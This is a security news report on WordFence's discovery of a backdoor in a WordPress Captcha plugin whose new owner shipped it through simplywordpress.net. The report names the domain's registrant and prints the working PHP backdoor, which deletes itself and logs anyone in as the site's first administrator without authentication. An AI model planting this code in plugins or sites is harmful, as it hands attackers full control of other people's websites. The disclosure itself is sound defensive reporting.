Captcha Plugin include backdoor that affects 300K WordPress sites

WordFence security experts found that Captcha WordPress plugin that downloads as much as 300,000 times, hides a backdoor that allows potential attackers to gain administrative access to the WordPress website without requiring any authentication.

Captcha is a pragmatic verification code plug-in that can be used to enhance the login security of the WordPress site backstage, originally owned and maintained by the plug-in development company BestWebSoft.

On September 5 this year, BestWebSoft announced the transfer of ownership of Captcha, but at the time did not mention the relevant information about the takeover company. In just three months, Captcha’s new owner released version 4.3.7, which includes malicious code.

Security experts have found that malicious code triggers an automatic update process. First, connect to simplywordpress.net domain name to download a plugin update package (ZIP file). The update package is then automatically executed and installed to override the Captcha plug-in that originally ran the WordPress site.

This ZIP file contains a backdoor file called “plugin-update.php” that creates a session using the user ID (the default administrator user created when WordPress first installed), sets the authentication cookie, and then deletes itself. Since the backdoor installation code is not certified, this means that anyone can trigger it.

@unlink(__FILE__);


require('../../../wp-blog-header.php');
require('../../../wp-includes/pluggable.php');
$user_info = get_userdata(1);
// Automatic login //
$username = $user_info->user_login;
$user = get_user_by('login', $username );
// Redirect URL //
if ( !is_wp_error( $user ) )
{
wp_clear_auth_cookie();
wp_set_current_user ( $user->ID );
wp_set_auth_cookie ( $user->ID );

$redirect_to = user_admin_url();
wp_safe_redirect( $redirect_to );

exit();
}

WordFence found after investigation that Simplywordpress.net was registered at the email address scwellington@hotmail.co.uk with the registered name “Stacy Wellington”. By using reverse whois lookup, WordFence found that this user also registered a large number of other domain names.

Back to Simplywordpress.net, in addition to Captcha, it hosts a further five add-ons for download: Covert Me Popup, Death To Comments, Human Captcha, Smart Recaptcha and Social Exchange.

Without exception, these five plug-ins include the same backdoor installation code as Captcha. In addition, if you use “site:simplywordpress.net” Google search, you will find that the domain also provides the more plug-in download.

 

Currently, the WordPress plug-in team has removed it from the official WordPress plugin repository and has provided a secure version for affected users (Captcha 4.4.5). WordFence has also created three firewalls to protect users’ websites from the Captcha, rules that prevent Captcha from performing back-door installation code and five other plugins through simplywordpress.net.

In addition, WordFence has partnered with the WordPress plug-in team to fix versions of Captcha prior to 4.4.5.

Reference: wordfence